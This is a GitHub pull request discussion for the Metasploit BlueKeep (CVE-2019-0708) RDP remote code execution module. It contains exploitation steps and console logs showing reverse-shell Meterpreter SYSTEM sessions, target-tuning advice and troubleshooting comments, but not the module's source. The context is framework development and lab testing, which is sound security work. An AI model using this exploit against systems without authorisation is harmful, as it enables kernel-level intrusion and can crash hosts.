Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add initial exploit for CVE-2019-0708, BlueKeep #12283

Merged
merged 53 commits into from Sep 23, 2019
Merged

Conversation

@bcook-r7
Copy link
Contributor

@bcook-r7 bcook-r7 commented Sep 6, 2019

This PR adds an exploit module for CVE-2019-0708, a.k.a. BlueKeep, exploiting a remote Windows kernel use-after-free vulnerability via RDP. The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.

This module was originally developed by @zerosum0x0 and @ryhanson, then further moved along by @OJ, @zeroSteiner, @rickoates, @wvu-r7, @bwatters-r7, @wchen-r7, @tsellers-r7, @todb-r7 and others. The module was ported from a Python external module to a native Ruby module in order to take advantage of the RDP and other library enhancements in Metasploit. The original Python module is in the commit history if you wish to examine and compare it the the current implementation.

The module currently targets 64-bit versions of Windows 7 and Windows Server 2008 R2. For Windows Server 2008 R2, a registry entry needs to be modified to enable heap grooming via the RDPSND channel, though there remain other possibilities to explore for using alternate channels that are enabled by default on all Windows OSes.

The module is currently ranked as Manual, as the user needs to supply additional target information or risk crashing the target host. The module implements a default fingerprint-only TARGET option that just checks for a vulnerable host and displays some initial information about the specific target OS, but the user will need to specify a more exact target based on secondary recon, or until further improvements in this module enable more accurate determination of the target kernel memory layout at runtime.

There are specific targets for bare-metal, Virtualbox, VMware, and Hyper-V, though there may be additional variables in your target environment that additionally shift the base address for grooming, so we welcome any ideas from the community for automatically detecting this instead!

Todo

  • Fix error handling when licensing is incorrect

Optional Todo

  • Handle low-bandwidth networks more gracefully
  • Add detection for whether RDPSND channel-based grooming will work
  • Detect more OS specifics / obtain memory leak to determine Windows NPP start address
  • Write the XP/2003 portions grooming MS_T120.
  • Expand channels besides RDPSND/MS_T120 for grooming.

Verification

  • Start msfconsole
  • use exploit/rdp/cve_2019_0708_bluekeep_rce
  • set RHOSTS to target hosts (x64 Windows 7 or 2008 R2)
  • set PAYLOAD and associated options as desired
  • set TARGET to a more specific target based on your environment
  • Verify that you get a shell
  • Verify the target does not crash

Exploitation Sample Output

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 192.168.56.101

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.101:3389   - The target is vulnerable.
[-] 192.168.56.101:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploiting target 192.168.56.105
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.105:3389   - The target is vulnerable.
[-] 192.168.56.105:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
target => 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
[*] Exploiting target 192.168.56.101

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:3389   - Detected RDP on 192.168.56.101:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.101:3389   - The target is vulnerable.
[*] 192.168.56.101:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.56.101:3389 - Surfing channels ...
[*] 192.168.56.101:3389 - Lobbing eggs ...
[*] 192.168.56.101:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49159) at 2019-09-06 01:26:40 -0500
[*] Session 1 created in the background.
[*] Exploiting target 192.168.56.105
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.105:3389   - Detected RDP on 192.168.56.105:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[+] 192.168.56.105:3389   - The target is vulnerable.
[*] 192.168.56.105:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[*] 192.168.56.105:3389 - Surfing channels ...
[*] 192.168.56.105:3389 - Lobbing eggs ...
[*] 192.168.56.105:3389 - Forcing the USE of FREE'd object ...
[*] Sending stage (206403 bytes) to 192.168.56.105
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.105:49158) at 2019-09-06 01:26:58 -0500
[*] Session 2 created in the background.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ BCOOK-PC         192.168.56.1:4444 -> 192.168.56.101:49159 (192.168.56.101)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN-VVEKS0PTPFB  192.168.56.1:4444 -> 192.168.56.105:49158 (192.168.56.105)
@bcoles
Copy link
Contributor

@bcoles bcoles commented Sep 6, 2019

To test, ensure you've copied all four .rb files from this PR, then restart msfconsole.

This PR includes changes to the core RDP library in Metasploit for this exploit. Make sure to download and edit all the files changed (https://github.com/rapid7/metasploit-framework/pull/12283/files)

  • lib/msf/core/exploit/rdp.rb
  • modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
  • modules/auxiliary/scanner/rdp/rdp_scanner.rb
  • modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

@bcoles
Copy link
Contributor

@bcoles bcoles commented Sep 6, 2019

I've tried this on Windows 2008 R2 Enterprise (x64) (2GB RAM) on VMware® Workstation 15 Player 15.1.0 build-13591040.

Exploit failed, but the host didn't crash either.

Edit: Looks like it failed at the license packet step. Which makes sense, as the service was configured with no license, within the 120 day license grace period.

  • NLA disabled
  • HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 3
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > check

[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Detected RDP on 172.16.191.198:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.198:3389   - Sending erect domain request
[*] 172.16.191.198:3389   - Sending client info PDU
[*] 172.16.191.198:3389   - Received License packet
[*] 172.16.191.198:3389   - Sending client confirm active PDU
[*] 172.16.191.198:3389   - Sending client synchronize PDU
[*] 172.16.191.198:3389   - Sending client control cooperate PDU
[*] 172.16.191.198:3389   - Sending client control request control PDU
[-] 172.16.191.198:3389   - Connection reset
[*] 172.16.191.198:3389   - Cannot reliably check exploitability.
[*] 172.16.191.198:3389 - Cannot reliably check exploitability.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Verifying RDP protocol...
[*] 172.16.191.198:3389   - Attempting to connect using TLS security
[*] 172.16.191.198:3389   - Detected RDP on 172.16.191.198:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.198:3389   - Sending erect domain request
[*] 172.16.191.198:3389   - Sending client info PDU
[*] 172.16.191.198:3389   - Received License packet
[*] 172.16.191.198:3389   - Sending client confirm active PDU
[*] 172.16.191.198:3389   - Sending client synchronize PDU
[*] 172.16.191.198:3389   - Sending client control cooperate PDU
[*] 172.16.191.198:3389   - Sending client control request control PDU
[-] 172.16.191.198:3389   - Connection reset
[*] 172.16.191.198:3389   - Cannot reliably check exploitability.
[*] 172.16.191.198:3389 - Verifying RDP protocol...
[*] 172.16.191.198:3389 - Attempting to connect using TLS security
[*] 172.16.191.198:3389 - Sending erect domain request
[*] 172.16.191.198:3389 - Sending client info PDU
[*] 172.16.191.198:3389 - Received License packet
[*] 172.16.191.198:3389 - Sending client confirm active PDU
[*] 172.16.191.198:3389 - Sending client synchronize PDU
[*] 172.16.191.198:3389 - Sending client control cooperate PDU
[*] 172.16.191.198:3389 - Sending client control request control PDU
[-] 172.16.191.198:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 

Windows 7 SP 1 Professional (x64) (4GB RAM) on VMware® Workstation 15 Player 15.1.0 build-13591040.

  • set target 1 - fail. no shell. blue screen after repeated attempts.
  • set target 3 - always blue screen (SYSTEM_SERVICE_EXCEPTION, termdd.sys PAGE_FAULT_IN_NONPAGED_AREA)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target
target => 3
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)


msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > check

[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Detected RDP on 172.16.191.130:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.130:3389   - Sending erect domain request
[*] 172.16.191.130:3389   - Sending client info PDU
[*] 172.16.191.130:3389   - Received License packet
[*] 172.16.191.130:3389   - Waiting for Server Demand packet
[*] 172.16.191.130:3389   - Received Server Demand packet
[*] 172.16.191.130:3389   - Sending client confirm active PDU
[*] 172.16.191.130:3389   - Sending client synchronize PDU
[*] 172.16.191.130:3389   - Sending client control cooperate PDU
[*] 172.16.191.130:3389   - Sending client control request control PDU
[*] 172.16.191.130:3389   - Sending client input sychronize PDU
[*] 172.16.191.130:3389   - Sending client font list PDU
[*] 172.16.191.130:3389   - Sending patch check payloads
[+] 172.16.191.130:3389   - The target is vulnerable.
[+] 172.16.191.130:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Verifying RDP protocol...
[*] 172.16.191.130:3389   - Attempting to connect using TLS security
[*] 172.16.191.130:3389   - Detected RDP on 172.16.191.130:3389   (Windows version: 6.1.7601) (Requires NLA: No)
[*] 172.16.191.130:3389   - Sending erect domain request
[*] 172.16.191.130:3389   - Sending client info PDU
[*] 172.16.191.130:3389   - Received License packet
[*] 172.16.191.130:3389   - Waiting for Server Demand packet
[*] 172.16.191.130:3389   - Received Server Demand packet
[*] 172.16.191.130:3389   - Sending client confirm active PDU
[*] 172.16.191.130:3389   - Sending client synchronize PDU
[*] 172.16.191.130:3389   - Sending client control cooperate PDU
[*] 172.16.191.130:3389   - Sending client control request control PDU
[*] 172.16.191.130:3389   - Sending client input sychronize PDU
[*] 172.16.191.130:3389   - Sending client font list PDU
[*] 172.16.191.130:3389   - Sending patch check payloads
[+] 172.16.191.130:3389   - The target is vulnerable.
[*] 172.16.191.130:3389 - Verifying RDP protocol...
[*] 172.16.191.130:3389 - Attempting to connect using TLS security
[*] 172.16.191.130:3389 - Sending erect domain request
[*] 172.16.191.130:3389 - Sending client info PDU
[*] 172.16.191.130:3389 - Received License packet
[*] 172.16.191.130:3389 - Waiting for Server Demand packet
[*] 172.16.191.130:3389 - Received Server Demand packet
[*] 172.16.191.130:3389 - Sending client confirm active PDU
[*] 172.16.191.130:3389 - Sending client synchronize PDU
[*] 172.16.191.130:3389 - Sending client control cooperate PDU
[*] 172.16.191.130:3389 - Sending client control request control PDU
[*] 172.16.191.130:3389 - Sending client input sychronize PDU
[*] 172.16.191.130:3389 - Sending client font list PDU
[*] 172.16.191.130:3389 - Handling SERVER ANNOUNCE ...
[*] 172.16.191.130:3389 - Handling SERVER CAPABILITY ...
[*] 172.16.191.130:3389 - Handling CLIENT ID CONFIRM ...
[*] 172.16.191.130:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 172.16.191.130:3389 - Creating free trigger for user 13 on channel 1013
[*] 172.16.191.130:3389 - Surfing channels ...
[*] 172.16.191.130:3389 - Lobbing eggs ...
[*] 172.16.191.130:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > 

@busterb
Copy link
Member

@busterb busterb commented Sep 6, 2019

Thanks @bcoles will take a look at the VMware target. We may be a bit over-broad in which VMWare product we're specifying there, though of course it would be nice to not need these specific targets at the risk of having a combinatorial target explosion.

@rockstardev
Copy link

@rockstardev rockstardev commented Sep 6, 2019

Godspeed my friends... let's hope enough people patch their systems before pwning starts.

@ghost
Copy link

@ghost ghost commented Sep 6, 2019

@bcoles the different targets mostly have to do with hot-swap memory. When it's enabled, the NT kernel must allocate more PFN table PTE metadata structures before the actual start of the NPP.

If hot-swap memory is disabled (nominal) I would expect the default target to work. A full kernel crash dump is required for analysis though, the minidumps don't carry enough info forward.

@Zn00k
Copy link

@Zn00k Zn00k commented Sep 6, 2019

[*] Started reverse TCP handler on 192.168.146.128:4444 
[+] IP:3389  - The target is vulnerable.
[-] IP:3389 - Exploit failed: NameError undefined local variable or method rdp_connect for #<Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00005585bce1ee60>
Did you mean?  disconnect
[*] Exploit completed, but no session was created.

@422926799
Copy link

@422926799 422926799 commented Sep 6, 2019

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/

rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb 替换 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替换 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

@kevthehermit
Copy link

@kevthehermit kevthehermit commented Sep 7, 2019

What is the easiest way to identify the Groombase for other targets - Looking at a Server 2008 R2 on AWS (Uploaded a vulnerable image that had been tested locally with VMware)

@MartinIngesen
Copy link

@MartinIngesen MartinIngesen commented Sep 7, 2019

[*] Started reverse TCP handler on 192.168.146.128:4444 [+] IP:3389 - The target is vulnerable. [-] IP:3389 - Exploit failed: NameError undefined local variable or method rdp_connect' for #Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00005585bce1ee60
Did you mean? disconnect
[*] Exploit completed, but no session was created.
`

There were changes made to the core rdp library in Metasploit for this exploit. Make sure to download and edit all the files changed (https://github.com/rapid7/metasploit-framework/pull/12283/files)

@xkkhh

This comment was marked as off-topic.

@DoktorCranium
Copy link

@DoktorCranium DoktorCranium commented Sep 7, 2019

What is the version of VirtualBox this has been tested on? I keep getting BSODs on both vulnerable Win7 and Win2k8 (Running VirtualBox 6.0.12 r133076 on x86_64 Linux)

[] Started reverse TCP handler on 192.168.11.9:4444
[
] 10.0.2.21:3389 - Detected RDP on 10.0.2.21:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 10.0.2.21:3389 - The target is vulnerable.
[] 10.0.2.21:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[
] 10.0.2.21:3389 - Surfing channels ...
[] 10.0.2.21:3389 - Lobbing eggs ...
[
] 10.0.2.21:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

Id Name


0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

@jack-99
Copy link

@jack-99 jack-99 commented Sep 7, 2019

为什么我更新了msf,也没有找到这个利用模块

@MartinIngesen
Copy link

@MartinIngesen MartinIngesen commented Sep 7, 2019

i was successfully able to run this against Windows 7 Ultimate x64 (7601) SP1 using VMware® Workstation 15 Pro (15.1.0 build-13591040)

@422926799
Copy link

@422926799 422926799 commented Sep 7, 2019

为什么我更新了无国界医生,也没有找到这个利用模块

得自己导入4个rb

@ghost
Copy link

@ghost ghost commented Sep 7, 2019

70周年前发毛?国内的看这里:http://blog.xkkhh.cn/archives/535

大佬有没有找个物理机试试,如果不修改注册表的话是不是就没法复现了。

@jack-99
Copy link

@jack-99 jack-99 commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /

rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

@422926799
Copy link

@422926799 422926799 commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

2008 r2要改注册表,不然会GG,你康上面

@jack-99
Copy link

@jack-99 jack-99 commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

2008 r2要改注册表,不然会GG,你康上面

我打的是win7 sp1的

@422926799
Copy link

@422926799 422926799 commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

2008 r2要改注册表,不然会GG,你康上面

我打的是win7 sp1的

黑人问号

@jack-99
Copy link

@jack-99 jack-99 commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

2008 r2要改注册表,不然会GG,你康上面

我打的是win7 sp1的

黑人问号

我攻击的目标是win7 啊,win7不也受影响么,但是每次攻击都会蓝屏

@422926799
Copy link

@422926799 422926799 commented Sep 7, 2019

cve_2019_0708_bluekeep_rce.rb添加/ usr / share / metasploit-framework / modules / exploit / windows / rdp /
rdp.rb替换/usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb替换/usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb替换/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

我成功导入后,发现每次攻击都会蓝屏

2008 r2要改注册表,不然会GG,你康上面

我打的是win7 sp1的

黑人问号

我攻击的目标是win7 啊,win7不也受影响么,但是每次攻击都会蓝屏

我这边也有朋友有这个问题,好像是target的问题

@hahadaxia

This comment was marked as off-topic.

@evil0xxx

This comment has been hidden.

@busterb
Copy link
Member

@busterb busterb commented Sep 7, 2019

i was successfully able to run this against Windows 7 Ultimate x64 (7601) SP1 using VMware® Workstation 15 Pro (15.1.0 build-13591040)

Thanks for the note @MartinIngesen I was able to reproduce @bcoles crash above with VMWare Fusion 11.

@busterb
Copy link
Member

@busterb busterb commented Sep 7, 2019

What is the version of VirtualBox this has been tested on? I keep getting BSODs on both vulnerable Win7 and Win2k8 (Running VirtualBox 6.0.12 r133076 on x86_64 Linux)

@DoktorCranium VirtualBox 6.0.10 on Linux and Mac.

@adeljck
Copy link

@adeljck adeljck commented Sep 7, 2019

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options

Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce):

Name Current Setting Required Description


RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS yes The target address range or CIDR identifier
RPORT 3389 yes The target port (TCP)

Exploit target:

Id Name


0 Automatic targeting via fingerprinting

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 154.8.170.33
rhosts => 154.8.170.33
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[] Started reverse TCP handler on 192.168.1.3:4444
[
] 154.8.170.33:3389 - Cannot reliably check exploitability.
[-] 154.8.170.33:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.

give some help

@Ghost-Assassin

This comment was marked as off-topic.

@busterb
Copy link
Member

@busterb busterb commented Sep 23, 2019

Landing this module now, further improvements will come in new PRs. Thanks everyone for testing and notes!

@bcook-r7 bcook-r7 merged commit c0be631 into rapid7:master Sep 23, 2019
3 checks passed
@cbwang505
Copy link

@cbwang505 cbwang505 commented Sep 24, 2019

@brandenjlynch
Copy link

@brandenjlynch brandenjlynch commented Sep 27, 2019

I keep seeing this error: "Exploit failed: NameError uninitialized constant OpenSSL::SSL::TLS1_VERSION"

As far as I can tell all the code is up to date, just pulled it down via git. Any thoughts? OpenSSL should already be required, so..

@zeroSteiner
Copy link
Contributor

@zeroSteiner zeroSteiner commented Sep 27, 2019

@brandenjlynch I'd run into the same error. It was an issue with my environment, IIRC the OpenSSL gem hadn't installed correctly. I would suggest you verify your version of ruby is correct and then reinstall that gem. I believe it tries to compile from source so make sure you have the development headers available.

@brandenjlynch
Copy link

@brandenjlynch brandenjlynch commented Sep 27, 2019

@zeroSteiner Thanks I'll try that!

@robertgov
Copy link

@robertgov robertgov commented Sep 27, 2019

Has anyone succeeded with a physical machine? The vmware unpached win 7 worked with a little groomsize tweaqking but can't even get to a 'bluescreen' on my other laptop in a lab test.

@busterb
Copy link
Member

@busterb busterb commented Sep 30, 2019

Release Notes

This adds an exploit module for CVE-2019-0708, a.k.a. BlueKeep, exploiting a remote Windows kernel use-after-free vulnerability via RDP. The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120, allowing a malformed Disconnect Provider Indication message to cause use-after-free. With a controllable data/size remote nonpaged pool spray, an indirect call gadget of the freed channel is used to achieve arbitrary code execution.

@terabytexr3
Copy link

@terabytexr3 terabytexr3 commented Oct 5, 2019

When i try in Kali many problem, almost GROOMSIZE and Target.
But i try windows version its good. Its very easy.
https://youtu.be/SCsJ9Uq3POk

@qiushui-sir
Copy link

@qiushui-sir qiushui-sir commented Oct 9, 2019

When I tested, I always had the following questions
[*] Started reverse TCP handler on 192.168.1.119:4444 [*] 192.168.1.120:3389 - Detected RDP on 192.168.1.120:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.1.120:3389 - The target is vulnerable. [*] 192.168.1.120:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1. [*] 192.168.1.120:3389 - Surfing channels ... [*] 192.168.1.120:3389 - Lobbing eggs ... [-] 192.168.1.120:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created.
I set goals, target and RHOST
My steps are the same as others, and even I have re-installed the system and Vmware several times.
What's wrong with me? What's wrong with me?

@wvu
Copy link
Contributor

@wvu wvu commented Oct 9, 2019

Nothing is wrong with you.

@qiushui-sir
Copy link

@qiushui-sir qiushui-sir commented Oct 9, 2019

你没事。

What should I do to restore success?
Thank you.

@qiushui-sir
Copy link

@qiushui-sir qiushui-sir commented Oct 9, 2019

I just tried 2008 again, the same question.
[*] Started reverse TCP handler on 192.168.1.119:4444 [*] 192.168.1.122:3389 - Detected RDP on 192.168.1.122:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.1.122:3389 - The target is vulnerable. [*] 192.168.1.122:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1. [*] 192.168.1.122:3389 - Surfing channels ... [*] 192.168.1.122:3389 - Lobbing eggs ... [-] 192.168.1.122:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created.

@wvu
Copy link
Contributor

@wvu wvu commented Oct 9, 2019

What target did you select?

@qiushui-sir
Copy link

@qiushui-sir qiushui-sir commented Oct 10, 2019

您选择了什么目标?

I chose VMware, version 15.1.0.

@amagrupp
Copy link

@amagrupp amagrupp commented Oct 11, 2019

Не знаю что было изменено, но в virtual box эксплойт отрабатывает, но не создаёт сессию, не выполняет exeс, ничего.

В чем дело ?

@amagrupp
Copy link

@amagrupp amagrupp commented Oct 11, 2019

I don’t know what has been changed, but in the virtual box, the exploit works, but does not create a session, does not execute exec, nothing.

What's the matter ?

@wvu
Copy link
Contributor

@wvu wvu commented Oct 11, 2019

First of all, everyone needs to provide more details. Logs, screenshots, anything. Information about your setup. Version numbers. WinDbg sessions if you have to. The exploit's success is highly dependent on memory layout, specifically NPP base. It is impossible to provide support for this module without details. This is bug reporting 101.

Second of all, this is the pull request for the module, not a bug tracker. If you have bugs, please file them as issues. If you have support questions, ask on Slack, IRC, e-mail, or, if you're convinced GitHub is the place to be, ask via an issue. We will label it as question. This pull request is over.

Thank you.

@rapid7 rapid7 locked as resolved and limited conversation to collaborators Oct 11, 2019
@wvu
Copy link
Contributor

@wvu wvu commented Oct 11, 2019

Please read our CONTRIBUTING document. We would be happy to help everyone, just not here. Conversation on this PR is limited to development.

ETA: We've updated the document to clearly state where questions shouldn't go. Previously, it was stated where they should go and only implied where they shouldn't go. Thanks.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.